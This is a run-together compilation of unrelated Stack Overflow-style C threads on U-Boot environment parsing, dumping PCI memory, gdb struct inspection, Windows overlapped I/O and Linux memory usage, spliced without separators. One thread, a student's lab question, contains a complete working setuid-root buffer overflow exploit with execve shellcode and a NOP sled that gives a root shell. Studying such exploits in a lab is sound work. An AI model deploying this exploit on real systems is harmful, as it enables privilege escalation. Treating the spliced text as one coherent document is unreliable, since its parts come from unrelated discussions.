I'm stumped, and I need someone to tell me what I'm missing.
I've had to upgrade the U-Boot bootloader on my devices, and naturally I've had to make everything fit together again. Right now I'm trying to get the U-Boot environment variables accessible from Linux/Android.
Long story short, I've created a file /etc/fw_env.config that points to U-Boot's env section in Flash. As documented here: https://elinux.org/U-boot_environment_variables_in_linux
This has not been successful, so I started adding print statements to the source code to debug on my device. I tracked the error down to the get_config() function, which, as one could imagine, opens /etc/fw_env.config and writes the values within to the necessary variables.
I've narrowed it down further to the sscanf() call, which returns 0, as in zero variables read and/or written. So, as a sanity check, I isolated the call into a little standalone program, separate from my source code (keeping the variable names and structures exactly the same).
/* sscanf example */
#include <stdio.h>

struct envdev_s {
    const char *devname;        /* Device name */
    long long devoff;           /* Device offset */
    unsigned long env_size;     /* environment size */
    unsigned long erase_size;   /* device erase size */
    unsigned long env_sectors;  /* number of environment sectors */
    unsigned int mtd_type;      /* type of the MTD device */
};

static struct envdev_s envdevices[2] = {};

#define DEVNAME(i)    envdevices[(i)].devname
#define DEVOFFSET(i)  envdevices[(i)].devoff
#define ENVSIZE(i)    envdevices[(i)].env_size
#define DEVESIZE(i)   envdevices[(i)].erase_size
#define ENVSECTORS(i) envdevices[(i)].env_sectors
#define DEVTYPE(i)    envdevices[(i)].mtd_type

int main()
{
    char dump[] = "/dev/mtd1 0xc0000 0x2000 0x2000\n";
    char *devname;
    int i = 0;
    int rc;

    printf("I was here in get_config : dump = %s\n", dump);
    printf("I was here in get_config : i = %d\n", i);

    rc = sscanf(dump, "%ms %lli %lx %lx %lx",
                &devname,
                &DEVOFFSET(i),
                &ENVSIZE(i),
                &DEVESIZE(i),
                &ENVSECTORS(i));

    printf("I was here in get_config : rc = %d\n", rc);

    return 0;
}
Also recreated here: http://cpp.sh/5ckms
Now, when I run this independently, it works as I expect it to, in particular outputting:
I was here in get_config : rc = 4
4 being the expected result, since char dump[] = "/dev/mtd1 0xc0000 0x2000 0x2000\n"; only contains four fields for sscanf() to convert.
But when I compile this and run it on my device, it returns:
I was here in get_config : rc = 0
Computer says NO! And no other error messages to work with.
I'm obviously missing some fundamental understanding here. Either some permissions or some setup variables somewhere, but I wouldn't know where to start. Could someone please point me in the right direction?
For completeness, I am answering this question based on the help I have received here on StackOverflow:
As stated in the comments, %ms was not added until Android 9, and I was working on Android 6. It still did not produce any compiler errors, which is particularly misleading. I ended up using %s, which worked fine.
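For anyone hitting the same thing, here is roughly what the %s fallback looks like in isolation (a minimal sketch with my own fixed-size buffer and width cap, not the actual fw_env.c code):

/* sscanf fallback without %m: read the device name into a fixed buffer.
 * The buffer size and the %63s width cap are arbitrary choices for this sketch. */
#include <stdio.h>

int main(void)
{
    char dump[] = "/dev/mtd1 0xc0000 0x2000 0x2000\n";
    char devname[64];
    long long devoff;
    unsigned long env_size, erase_size, env_sectors;
    int rc;

    rc = sscanf(dump, "%63s %lli %lx %lx %lx",
                devname, &devoff, &env_size, &erase_size, &env_sectors);

    /* Expect rc == 4 here: the sample line has no sectors field. */
    printf("rc = %d, devname = %s\n", rc, devname);
    return 0;
}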
The idea behind this program is simply to access the RAM and dump the data from it to a text file.
Later I'll convert the text file to a JPEG, and hopefully it will be readable.
However, when I try to read from the RAM using NEW[] it takes waaaaaay too long to actually copy all the values into the file.
Isn't it supposed to be really fast? I mean, I save pictures every day and it doesn't even take a second.
Is there some other method I can use to dump memory to a file?
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <hw/pci.h>
#include <hw/inout.h>
#include <sys/mman.h>

int main()
{
    FILE *fp;
    fp = fopen("test.txt", "w+d");

    int NumberOfPciCards = 3;
    struct pci_dev_info info[NumberOfPciCards];
    void *PciDeviceHandler1, *PciDeviceHandler2, *PciDeviceHandler3;
    uint32_t *Buffer;
    int *BusNumb; //int Buffer;
    uint32_t counter = 0;
    int i;
    int r;
    int y;
    volatile uint32_t *NEW, *NEW2;
    uintptr_t iobase;
    volatile uint32_t *regbase;

    NEW = (uint32_t *)malloc(sizeof(uint32_t));
    NEW2 = (uint32_t *)malloc(sizeof(uint32_t));
    Buffer = (uint32_t *)malloc(sizeof(uint32_t));
    BusNumb = (int *)malloc(sizeof(int));

    printf("\n 1");

    for (r = 0; r < NumberOfPciCards; r++)
    {
        memset(&info[r], 0, sizeof(info[r]));
    }

    printf("\n 2");

    //Here the attach takes place.
    for (r = 0; r < NumberOfPciCards; r++)
    {
        (pci_attach(r) < 0) ? FuncPrint(1, r) : FuncPrint(0, r);
    }

    printf("\n 3");

    info[0].VendorId = 0x8086;  //Wont be using this one
    info[0].DeviceId = 0x3582;  //Or this one
    info[1].VendorId = 0x10B5;  //WIll only be using this one PLX 9054 chip
    info[1].DeviceId = 0x9054;  //Also PLX 9054
    info[2].VendorId = 0x8086;  //Not used
    info[2].DeviceId = 0x24cb;  //Not used

    printf("\n 4");

    //I attached the device and give it a handler and set some setting.
    if ((PciDeviceHandler1 = pci_attach_device(0, PCI_SHARE|PCI_INIT_ALL, 0, &info[1])) == 0)
    {
        perror("pci_attach_device fail");
        exit(EXIT_FAILURE);
    }

    for (i = 0; i < 6; i++)
    //This just prints out some details of the card.
    {
        if (info[1].BaseAddressSize[i] > 0)
            printf("Aperture %d: "
                   "Base 0x%llx Length %d bytes Type %s\n", i,
                   PCI_IS_MEM(info[1].CpuBaseAddress[i]) ? PCI_MEM_ADDR(info[1].CpuBaseAddress[i]) : PCI_IO_ADDR(info[1].CpuBaseAddress[i]),
                   info[1].BaseAddressSize[i], PCI_IS_MEM(info[1].CpuBaseAddress[i]) ? "MEM" : "IO");
    }
    printf("\nEnd of Device random info dump---\n");
    printf("\nNEWs Address : %d\n", *(int *)NEW);

    //Not sure if this is a legitimate way of memory allocation but I cant see to read the ram any other way.
    NEW = mmap_device_memory(NULL, info[1].BaseAddressSize[3], PROT_READ|PROT_WRITE|PROT_NOCACHE, 0, info[1].CpuBaseAddress[3]);

    //Here is where things are starting to get messy and REALLY long to just run through all the ram and dump it.
    //Is there some other way I can dump the data in the ram into a file?
    while (counter != info[1].BaseAddressSize[3])
    {
        fprintf(fp, "%x", NEW[counter]);
        counter++;
    }
    fclose(fp);
    printf("0x%x", *Buffer);
}
A few issues that I can see:
You are writing blocks of 4 bytes - that's quite inefficient. The stream buffering in the C library may help with that to a degree, but using larger blocks would still be more efficient.
Even worse, you are writing out the memory dump in hexadecimal notation, rather than the bytes themselves. That conversion is very CPU-intensive, not to mention that the size of the output is essentially doubled. You would be better off writing raw binary data using e.g. fwrite() (see the sketch at the end of this answer).
Depending on the specifics of your system (is this on QNX?), reading from I/O-mapped memory may be slower than reading directly from physical memory, especially if your PCI device has to act as a relay. What exactly is it that you are doing?
In any case I would suggest using a profiler to actually find out where your program is spending most of its time. Even a rudimentary system monitor would allow you to determine if your program is CPU-bound or I/O-bound.
As it is, "waaaaaay too long" is hardly a valid measurement. How much data is being copied? How long does it take? Where is the output file located?
P.S.: I also have some concerns w.r.t. what you are trying to do, but that is slightly off-topic for this question...
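For illustration, a minimal sketch of the raw-binary approach with fwrite(); region and region_size stand in for the question's NEW pointer and the mapped length (whether BaseAddressSize[3] counts bytes or 32-bit words is something you would have to confirm):

/* Sketch only: dump a memory region as raw bytes with one buffered call,
 * instead of millions of fprintf("%x", ...) calls. */
#include <stdio.h>

static int dump_region(const char *path, const void *region, size_t region_size)
{
    FILE *fp = fopen(path, "wb");   /* "wb": plain binary output */
    size_t written;

    if (!fp)
        return -1;
    written = fwrite(region, 1, region_size, fp);
    fclose(fp);
    return (written == region_size) ? 0 : -1;
}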
For fastest speed: write the data in binary form and use the open() / write() / close() APIs. Since your data is already available in a contiguous block of (virtual) memory, it is a waste to copy it to a temporary buffer (as used by the fwrite(), fprintf(), etc. APIs).
The code using write() will be similar to:
int fd = open("filename.bin", O_RDWR | O_CREAT, S_IRWXU);   /* needs <fcntl.h> */
write(fd, (void *)NEW, 4 * info[1].BaseAddressSize[3]);      /* needs <unistd.h> */
close(fd);
You will need to add error handling and make sure that the buffer size is specified correctly.
To reiterate, you get the speed-up from:
avoiding the conversion from binary to ASCII (as pointed out by others above)
avoiding many calls to libc
reducing the number of system-calls (from inside libc)
eliminating the overhead of copying data to a temporary buffer inside the fwrite()/fprintf() and related functions (buffering would be useful if your data arrived in small chunks, including the case of converting to ASCII in 4 byte units)
I am intentionally not commenting on other parts of your code, as it is apparently not intended to be production quality yet and your question focuses on how to speed up writing data to a file.
I'm a computer engineering student who is studying how stack buffer overflows work. The book I'm reading is The Art of Exploitation (1st edition) by Jon Erickson.
In order to practice what I'm studying I've installed the Damn Vulnerable Linux distribution in a virtual machine. I've disabled ASLR (kernel.randomize_va_space = 0), I've compiled the following code with GCC 3.4.6, I'm using GDB 6.6 and the kernel of the distribution is 2.6.20. My computer has an Intel processor.
The vulnerable program (test2) is owned by root and has the setuid bit set.
The vulnerable code is the following:
//test2.c
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[500];
    strcpy(buffer, argv[1]);
    return 0;
}
While the exploit code, created by normal (non root) user, is the following:
//main.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char shellcode[] =
    "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

unsigned long sp(void)
{
    __asm__("movl %esp, %eax");
}

int main(int argc, char *argv[])
{
    int i, offset;
    long esp, ret, *addr_ptr;
    char *buffer2, *ptr;

    offset = 0;
    esp = sp();
    ret = esp - offset;

    printf("Stack pointer (ESP) : 0x%x\n", esp);
    printf(" Offset from ESP : 0x%x\n", offset);
    printf("Desired Return Addr : 0x%x\n", ret);

    buffer2 = malloc(600);

    ptr = buffer2;
    addr_ptr = (long *)ptr;
    for (i = 0; i < 600; i += 4)
    {
        *(addr_ptr++) = ret;
    }

    for (i = 0; i < 200; i++)
    {
        buffer2[i] = '\x90';
    }

    ptr = buffer2 + 200;
    for (i = 0; i < strlen(shellcode); i++)
    {
        *(ptr++) = shellcode[i];
    }

    buffer2[600 - 1] = 0;

    execl("/root/workspace/test2/Release/test2", "test2", buffer2, 0);

    free(buffer2);
    return 0;
}
The program works, it exploits the buffer overflow vulnerability in test2 and gives me a root shell.
What I don't understand, even after reading the book several times and trying to find answers on the internet, is why the value of the stack pointer that we store in the variable esp is the return address of our shellcode. I've disassembled the program with GDB and everything works as the author says but I don't understand why this happens.
I would have liked to show you what the disassembled program and the memory looked like during execution, but I cannot copy/paste from the guest machine in the virtual machine and I'm not allowed to insert images in my question. So I can only try to describe what happens during execution of the program main (the one that exploits the BOF in test2):
Disassembling main, I see that 28 bytes are allocated on the stack (7 variables * 4 bytes). Then the function sp() is called and the value of the stack pointer is stored in esp. The value stored in the variable esp is 0xbffff344. Then, as you can see, we have some printf calls, we store the payload in buffer2 and then we call the execl function, passing buffer2 as an argument.
Now the root shell shows up and then the program exits. Disassembling the program after setting a different offset, I can clearly see that 0xbffff344 is precisely the address where the payload is stored when test2 is executed. Could you explain to me how this happens? Does execl set up a new stack frame for the test2 program? In main.c only 28 bytes are allocated on the stack, while in test2 500 bytes are allocated on the stack (for buffer). So how do I know that the stack pointer that I get in main.c is precisely the return address of the shellcode?
I thank you and apologize if I wrote some stupid things.
Could you explain to me how this happens?
When ASLR is disabled every executable starts at the same addresses, so given the stack pointer you are able to guess the required offset to find your buffer's location in test2. This is also where the NOP sled becomes useful, since it gives you multiple possible hits if the offset is not the exact displacement to the shellcode.
That being said, the fact that the value of ESP in the main function of your exploit program IS the location of the executed buffer in test2 seems incorrect. Are you sure you didn't misinterpret the gdb results?
You should be able to compute the location of the buffer using the following: esp - 500 + 28.
Note that you should always wear gloves when using such a formula: how the compiler handles locals (size, order, etc.) can vary.
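For what it's worth, a tiny sketch of that calculation using a cleaner variant of the exploit's sp(); the constants 500 and 28 come straight from the question, and as said above the real layout depends on the compiler:

/* Sketch: guess the address of test2's buffer from this process's ESP,
 * per the formula above (500 = sizeof(buffer) in test2, 28 = main.c locals).
 * 32-bit x86 only, like the book's example. */
#include <stdio.h>

static unsigned long sp(void)
{
    unsigned long esp;
    __asm__("movl %%esp, %0" : "=r"(esp));
    return esp;
}

int main(void)
{
    unsigned long esp   = sp();
    unsigned long guess = esp - 500 + 28;

    printf("ESP here            : 0x%lx\n", esp);
    printf("Guessed buffer addr : 0x%lx\n", guess);
    return 0;
}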
So how do I know that the stack pointer that I get in main.c is precisely the return address of the shellcode?
Well, you don't. It depends on the machine, how the program was compiled, etc.
Does execl set up a new stack frame for the test2 program?
From the execve man pages :
The exec family of functions shall replace the current process image
with a new process image. The new image shall be constructed from a
regular, executable file called the new process image file. There
shall be no return from a successful exec, because the calling process
image is overlaid by the new process image.
The stack is replaced by a new one for test2.
Hope it helps :)
I have a program running on an ARM-based embedded device. A certain struct, globally accessible, is being dumped every so often to disk and represents about 160 KB of data.
I need to examine the contents of this structure. So far I have used a Python script together with the struct library to parse the contents of that dump, but this approach doesn't scale very well.
I thought it was possible to use the cross-compiling GDB program to do this. I want to copy the contents of that file back into memory, at the address of the structure. So this is what I tried:
$ arm-eabi-gdb
....
(gdb) target sim
Connected to the simulator.
(gdb) file MS.elf
Reading symbols from MS.elf...done.
(gdb) p &my_struct
$1 = (MyStruct *) 0x6801149c
(gdb) restore ~/Dumps/MS_20121128_164606 binary 0x6801149c
You can't do that without a process to debug.
Is this the correct approach? If yes, what am I doing wrong?
I would write a small program that reads in the struct, and then print it from the debugger.
The program needs to be compiled on a system with the same architecture characteristics as the ARM target, i.e. the same sizeof for char, int, short, long, float, double and pointers. Also, the byte ordering needs to be the same as on the ARM.
If you are looking at the struct often, then it would be
worth pretty printing out the contents of the struct
instead of constantly using gdb to see the contents.
Since the structure is quite large, I would also go the
extra step of using an API that puts the structure
in a folder/document type tree in a browser so that
you can zoom in or browse different parts of the struct.
If anyone is interested in this, let me know.
#include <stdio.h>
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>

struct Foo {
    /* contents of the struct go here */
};

int
main()
{
    struct Foo tmp;
    int fd, r, n = sizeof(tmp);

    fd = open("struct_dump", O_RDONLY);
    if (fd < 0) {
        printf("could not open struct_dump.\n");
        exit(0);
    }

    r = read(fd, &tmp, n);
    if (r != n) {
        printf("mismatched struct sizes.\n");
        exit(0);
    }

    /*
     * Stop here in gdb and do 'p tmp'
     */

    close(fd);
    exit(0);
}
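If you want to eyeball the dump without gdb at all, here is a minimal sketch in the spirit of the pretty-printing suggestion above; it only hex-dumps the raw bytes, since the real fields of the struct are not shown here, and struct_dump is the same placeholder file name as above:

/* Sketch: hex-dump the raw bytes of the struct dump, 16 per line.
 * Field-by-field pretty printing would need the real struct definition. */
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    FILE *f = fopen("struct_dump", "rb");
    unsigned char byte;
    unsigned long offset = 0;

    if (!f) {
        perror("struct_dump");
        return EXIT_FAILURE;
    }
    while (fread(&byte, 1, 1, f) == 1) {
        if (offset % 16 == 0)
            printf("\n%08lx:", offset);
        printf(" %02x", byte);
        offset++;
    }
    printf("\n");
    fclose(f);
    return 0;
}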
I have a C application which generates a lot of output and for which speed is critical. The program is basically a loop over a large (8-12 GB) binary input file which must be read sequentially. In each iteration the read bytes are processed and output is generated and written to multiple files, but never to multiple files at the same time. So if you are at the point where output is generated and there are 4 output files, you write to either file 0 or 1 or 2, or 3. At the end of the iteration I now write the output using fwrite(), thereby waiting for the write operation to finish. The total number of output operations is large, up to 4 million per file, and the output size of the files ranges from 100 MB to 3.5 GB. The program runs on a basic multicore processor.
I want to write output in a separate thread and I know this can be done with
Asyncronous I/O
Creating threads
I/O completion ports
I have two types of questions, namely conceptual and code-specific.
Conceptual Question
What would be the best approach? Note that the application should be portable to Linux; however, I don't see how that would be very important for my choice between 1-3, since I would write a wrapper around anything kernel/API-specific. For me the most important criterion is speed. I have read that option 1 is not that likely to increase the performance of the program and that the kernel in any case creates new threads for the I/O operation, so why not use option 2 immediately, with the advantage that it seems easier to program (also since I did not succeed with option 1, see the code issues below).
Note that I read https://stackoverflow.com/questions/3689759/how-can-i-run-a-specific-function-of-thread-asynchronously-in-c-c, but I don't see a motivation for what to use based on the nature of the application. So I hope somebody could give me some advice on what would be best in my situation. Also, from the book "Windows System Programming" by Johnson M. Hart, I know that the recommendation is to use threads, mainly because of their simplicity. However, will that also be fastest?
Code Question
This question involves the attempts I made so far to make asynchronous I/O work. I understand that it's a big piece of code, so it's not that easy to look into. In any case I would really appreciate any attempt.
To decrease execution time I try to write the output in the background using the WinAPI, via CreateFile() with FILE_FLAG_OVERLAPPED and an OVERLAPPED structure. I have created a sample program in which I try to get this to work. However, I encountered two problems:
The file is only opened in overlapped mode when I delete an already existing file (I have tried using CreateFile in different modes (CREATE_ALWAYS, CREATE_NEW, OPEN_EXISTING), but this does not help).
Only the first WriteFile is executed asynchronously; the remaining WriteFile calls are synchronous. For this problem I already consulted http://support.microsoft.com/kb/156932. It seems that the problem is related to the fact that "any write operation to a file that extends its length will be synchronous". I've already tried to solve this by increasing the file size/valid data size (commented-out region in the code), but I still do not get it to work. I'm aware that, to get the most out of asynchronous I/O, I should perhaps use CreateFile with FILE_FLAG_NO_BUFFERING, but I cannot get this to work either.
Please note that the program creates a file of about 120 MB in the execution path. Also note that the "not ok" print statements are not desirable; I would like to see "can do work in background" appear on my screen... What is going wrong here?
#include <windows.h>
#include <math.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

#define ASYNC // remove this definition to run synchronously (i.e. using fwrite)

#ifdef ASYNC
struct _OVERLAPPED *pOverlapped;
HANDLE *pEventH;
HANDLE *pFile;
#else
FILE *pFile;
#endif

#define DIM_X 100
#define DIM_Y 150000

#define _PRINTERROR(msgs)\
    {printf("file: %s, line: %d, %s",__FILE__,__LINE__,msgs);\
    fflush(stdout);\
    return 0;} \

#define _PRINTF(msgs)\
    {printf(msgs);\
    fflush(stdout);} \

#define _START_TIMER \
    time_t time1,time2; \
    clock_t clock1; \
    time(&time1); \
    printf("start time: %s",ctime(&time1)); \
    fflush(stdout);

#define _END_TIMER\
    time(&time2);\
    clock1 = clock();\
    printf("end time: %s",ctime(&time2));\
    printf("elapsed processor time: %.2f\n",(((float)clock1)/CLOCKS_PER_SEC));\
    fflush(stdout);

double aio_dat[DIM_Y] = {0};

double do_compute(double A,double B, int arr_len);

int main()
{
    _START_TIMER;
    const char *pName = "test1.bin";
    DWORD dwBytesToWrite;
    BOOL bErrorFlag = FALSE;
    int j=0;
    int i=0;
    int fOverlapped=0;

#ifdef ASYNC
    // create / open the file
    pFile=CreateFile(pName,
                     GENERIC_WRITE,          // open for writing
                     0,                      // share write access
                     NULL,                   // default security
                     CREATE_ALWAYS,          // create new/overwrite existing
                     FILE_FLAG_OVERLAPPED,   // | FILE_FLAG_NO_BUFFERING, // overlapped file
                     NULL);                  // no attr. template

    // check whether file opening was ok
    if(pFile==INVALID_HANDLE_VALUE){
        printf("%x\n",GetLastError());
        _PRINTERROR("file not opened properly\n");
    }

    // make the overlapped structure
    pOverlapped = calloc(1,sizeof(struct _OVERLAPPED));
    pOverlapped->Offset = 0;
    pOverlapped->OffsetHigh = 0;

    // put event handle in overlapped structure
    if(!(pOverlapped->hEvent = CreateEvent(NULL,TRUE,FALSE,NULL))){
        printf("%x\n",GetLastError());
        _PRINTERROR("error in createevent\n");
    }
#else
    pFile = fopen(pName,"wb");
#endif

    // create some output
    for(j=0;j<DIM_Y;j++){
        aio_dat[j] = do_compute(i, j, DIM_X);
    }

    // determine how many bytes should be written
    dwBytesToWrite = (DWORD)sizeof(aio_dat);

    for(i=0;i<DIM_X;i++){ // do this DIM_X times

#ifdef ASYNC
        //if(i>0){
        //SetFilePointer(pFile,dwBytesToWrite,NULL,FILE_CURRENT);
        //if(!(SetEndOfFile(pFile))){
        //  printf("%i\n",pFile);
        //  _PRINTERROR("error in set end of file\n");
        //}
        //SetFilePointer(pFile,-dwBytesToWrite,NULL,FILE_CURRENT);
        //}

        // write the bytes
        if(!(bErrorFlag = WriteFile(pFile,aio_dat,dwBytesToWrite,NULL,pOverlapped))){
            // check whether io pending or some other error
            if(GetLastError()!=ERROR_IO_PENDING){
                printf("lasterror: %x\n",GetLastError());
                _PRINTERROR("error while writing file\n");
            }
            else{
                fOverlapped=1;
            }
        }
        else{
            // if you get here output got immediately written; bad!
            fOverlapped=0;
        }

        if(fOverlapped){
            // do background, this msgs is what I want to see
            for(j=0;j<DIM_Y;j++){
                aio_dat[j] = do_compute(i, j, DIM_X);
            }
            for(j=0;j<DIM_Y;j++){
                aio_dat[j] = do_compute(i, j, DIM_X);
            }
            _PRINTF("can do work in background\n");
        }
        else{
            // not overlapped, this message is bad
            _PRINTF("not ok\n");
        }

        // wait to continue
        if((WaitForSingleObject(pOverlapped->hEvent,INFINITE))!=WAIT_OBJECT_0){
            _PRINTERROR("waiting did not succeed\n");
        }

        // reset event structure
        if(!(ResetEvent(pOverlapped->hEvent))){
            printf("%x\n",GetLastError());
            _PRINTERROR("error in resetevent\n");
        }

        pOverlapped->Offset+=dwBytesToWrite;
#else
        fwrite(aio_dat,sizeof(double),DIM_Y,pFile);
        for(j=0;j<DIM_Y;j++){
            aio_dat[j] = do_compute(i, j, DIM_X);
        }
        for(j=0;j<DIM_Y;j++){
            aio_dat[j] = do_compute(i, j, DIM_X);
        }
#endif
    }

#ifdef ASYNC
    CloseHandle(pFile);
    free(pOverlapped);
#else
    fclose(pFile);
#endif

    _END_TIMER;
    return 1;
}

double do_compute(double A,double B, int arr_len)
{
    int i;
    double res = 0;
    double *xA = malloc(arr_len * sizeof(double));
    double *xB = malloc(arr_len * sizeof(double));

    if ( !xA || !xB )
        abort();

    for (i = 0; i < arr_len; i++) {
        xA[i] = sin(A);
        xB[i] = cos(B);
        res = res + xA[i]*xA[i];
    }

    free(xA);
    free(xB);

    return res;
}
Useful links
http://software.intel.com/sites/products/documentation/studio/composer/en-us/2011/compiler_c/cref_cls/common/cppref_asynchioC_aio_read_write_eg.htm
http://www.ibm.com/developerworks/linux/library/l-async/?ca=dgr-lnxw02aUsingPOISIXAIOAPI
http://www.flounder.com/asynchexplorer.htm#Asynchronous%20I/O
I know this is a big question and I would like to thank everybody in advance who takes the trouble to read it and perhaps even respond!
You should be able to get this to work using the OVERLAPPED structure.
You're on the right track: the system is preventing you from writing asynchronously because every WriteFile extends the size of the file. However, you're doing the file size extension wrong. Simply calling SetEndOfFile will not actually reserve space in the MFT. Use the SetFileValidData function. This will allocate clusters for your file (note that they will contain whatever garbage the disk had there) and you should be able to execute WriteFile and your computation in parallel.
I would stay away from FILE_FLAG_NO_BUFFERING. You're after more performance through parallelism, I presume? Don't prevent the cache from doing its job.
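A rough sketch of that pre-extension step, assuming the handle was opened as in the question (GENERIC_WRITE, FILE_FLAG_OVERLAPPED) and that the final size is known up front; in the question's loop that would be (LONGLONG)dwBytesToWrite * DIM_X. Note that SetFileValidData only succeeds if the process token has SeManageVolumePrivilege enabled:

/* Sketch: pre-extend the file so later overlapped WriteFile calls do not
 * have to extend it (and therefore are not forced to run synchronously). */
#include <windows.h>

static BOOL preallocate(HANDLE hFile, LONGLONG totalBytes)
{
    LARGE_INTEGER size;
    size.QuadPart = totalBytes;

    if (!SetFilePointerEx(hFile, size, NULL, FILE_BEGIN))
        return FALSE;
    if (!SetEndOfFile(hFile))                  /* sets the logical file size */
        return FALSE;
    if (!SetFileValidData(hFile, totalBytes))  /* sets the valid data length;
                                                  needs SeManageVolumePrivilege */
        return FALSE;

    /* rewind; subsequent overlapped writes position via OVERLAPPED.Offset */
    size.QuadPart = 0;
    return SetFilePointerEx(hFile, size, NULL, FILE_BEGIN);
}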
Another option that you did not consider is a memory mapped file. Those are available on Windows and Linux. There is a handy Boost abstraction that you could use.
With a memory mapped file, every thread in your process could write its output to the file on its own time, assuming that the record sizes are known and each thread has its own output area.
The operating system will take care of writing the mapped pages to disk when needed or when it gets around to it or when you close the file. Maybe when you close the file. Now that I think about it, some operating systems may require that you call msync to guarantee it.
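A minimal Windows sketch of that idea in plain C (CreateFileMapping/MapViewOfFile rather than the Boost wrapper); the assumption is that the total output size is known up front, since the mapping is created at its full length:

/* Sketch: map an output file of known total size; threads then memcpy their
 * records into the view and the OS writes dirty pages back (FlushViewOfFile
 * can force it). Caller should close the handles on failure as well. */
#include <windows.h>

static void *map_output_file(const char *path, ULONGLONG totalBytes,
                             HANDLE *phFile, HANDLE *phMap)
{
    void *view = NULL;

    *phFile = CreateFileA(path, GENERIC_READ | GENERIC_WRITE, 0, NULL,
                          CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (*phFile == INVALID_HANDLE_VALUE)
        return NULL;

    *phMap = CreateFileMappingA(*phFile, NULL, PAGE_READWRITE,
                                (DWORD)(totalBytes >> 32), (DWORD)totalBytes, NULL);
    if (*phMap)
        view = MapViewOfFile(*phMap, FILE_MAP_WRITE, 0, 0, 0);

    return view;   /* caller: memcpy((char *)view + offset, data, len) */
}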
I don't see why you would want to write asynchronously. Doing things in parallel does not make them faster in all cases. If you write two files at the same time to the same disk, it will almost always be a lot slower. If that is the case, just write them one after another.
If you have some fancy drive like an SSD or a virtual RAM drive, parallel writing could be faster. You have to create a file at its full size first and then do your parallel magic.
Asynchronous writing is nice, but is done by any OS anyway. The potential gain for you is that you can do things other than writing to disk, like displaying a progress bar. This is where multi-threading can help you.
So imho you should use serial writing or parallel writing to multiple disks.
hth
I need to get the memory usage of the current process in C. Can someone offer a code sample of how to do this on a Linux platform?
I'm aware of the cat /proc/<your pid>/status method of getting memory usage, but I have no idea how to capture that in C.
BTW, it's for a PHP extension I'm modifying (granted, I'm a C newbie). If there are shortcuts available within the PHP extension API, that would be even more helpful.
The getrusage library function returns a structure containing a whole lot of data about the current process, including these:
long ru_ixrss; /* integral shared memory size */
long ru_idrss; /* integral unshared data size */
long ru_isrss; /* integral unshared stack size */
However, the most up-to-date Linux documentation says about these three fields:
(unmaintained) This field is currently unused on Linux
which the manual then defines as:
Not all fields are completed; unmaintained fields are set to zero by the kernel. (The unmaintained fields are provided for compatibility with other systems, and because they may one day be supported on Linux.)
See getrusage(2)
You can always just open the 'files' in the /proc system as you would a regular file (using the 'self' symlink so you don't have to look up your own pid):
FILE* status = fopen( "/proc/self/status", "r" );
Of course, you now have to parse the file to pick out the information you need.
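A rough sketch of that parsing step, pulling out just VmRSS (the field name and the kB unit are what /proc/self/status reports; the function name is mine and error handling is minimal):

/* Sketch: scan /proc/self/status line by line and report VmRSS in kB. */
#include <stdio.h>
#include <string.h>

long vm_rss_kb(void)
{
    FILE *status = fopen("/proc/self/status", "r");
    char line[256];
    long rss = -1;

    if (!status)
        return -1;
    while (fgets(line, sizeof line, status)) {
        if (strncmp(line, "VmRSS:", 6) == 0) {
            sscanf(line + 6, "%ld", &rss);   /* value is reported in kB */
            break;
        }
    }
    fclose(status);
    return rss;
}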
This is a terribly ugly and non-portable way of getting the memory usage, but since getrusage()'s memory tracking is essentially useless on Linux, reading /proc/<pid>/statm is the only way I know of to get the information on Linux.
If anyone knows of a cleaner, or preferably more cross-Unix, way of tracking memory usage, I would be very interested in learning how.
typedef struct {
    unsigned long size,resident,share,text,lib,data,dt;
} statm_t;

void read_off_memory_status(statm_t& result)
{
    unsigned long dummy;
    const char* statm_path = "/proc/self/statm";

    FILE *f = fopen(statm_path,"r");
    if(!f){
        perror(statm_path);
        abort();
    }
    if(7 != fscanf(f,"%lu %lu %lu %lu %lu %lu %lu",
                   &result.size,&result.resident,&result.share,&result.text,&result.lib,&result.data,&result.dt))
    {
        perror(statm_path);
        abort();
    }
    fclose(f);
}
From the proc(5) man-page:
/proc/[pid]/statm
    Provides information about memory usage, measured in pages.
    The columns are:

        size       total program size
                   (same as VmSize in /proc/[pid]/status)
        resident   resident set size
                   (same as VmRSS in /proc/[pid]/status)
        share      shared pages (from shared mappings)
        text       text (code)
        lib        library (unused in Linux 2.6)
        data       data + stack
        dt         dirty pages (unused in Linux 2.6)
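Since the statm values are in pages, here is a small standalone sketch of the pages-to-bytes conversion with sysconf(_SC_PAGESIZE), reading only the first two columns:

/* Sketch: statm reports pages; multiply by the page size to get bytes. */
#include <unistd.h>
#include <stdio.h>

int main(void)
{
    long page_size = sysconf(_SC_PAGESIZE);   /* bytes per page, e.g. 4096 */
    unsigned long size_pages, resident_pages;
    FILE *f = fopen("/proc/self/statm", "r");

    if (f && fscanf(f, "%lu %lu", &size_pages, &resident_pages) == 2) {
        printf("VmSize: %lu bytes, VmRSS: %lu bytes\n",
               size_pages * (unsigned long)page_size,
               resident_pages * (unsigned long)page_size);
    }
    if (f)
        fclose(f);
    return 0;
}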
I came across this post: http://appcrawler.com/wordpress/2013/05/13/simple-example-of-tracking-memory-using-getrusage/
Simplified version:
#include <sys/resource.h>
#include <stdio.h>

int main() {
    struct rusage r_usage;
    getrusage(RUSAGE_SELF,&r_usage);
    // Print the maximum resident set size used (in kilobytes).
    printf("Memory usage: %ld kilobytes\n",r_usage.ru_maxrss);
    return 0;
}
(tested in Linux 3.13)
#include <sys/resource.h>
#include <errno.h>
#include <stdio.h>

int main(void)
{
    errno = 0;
    struct rusage memory;
    getrusage(RUSAGE_SELF, &memory);
    if(errno == EFAULT)
        printf("Error: EFAULT\n");
    else if(errno == EINVAL)
        printf("Error: EINVAL\n");
    printf("Usage: %ld\n", memory.ru_ixrss);
    printf("Usage: %ld\n", memory.ru_isrss);
    printf("Usage: %ld\n", memory.ru_idrss);
    printf("Max: %ld\n", memory.ru_maxrss);
    return 0;
}
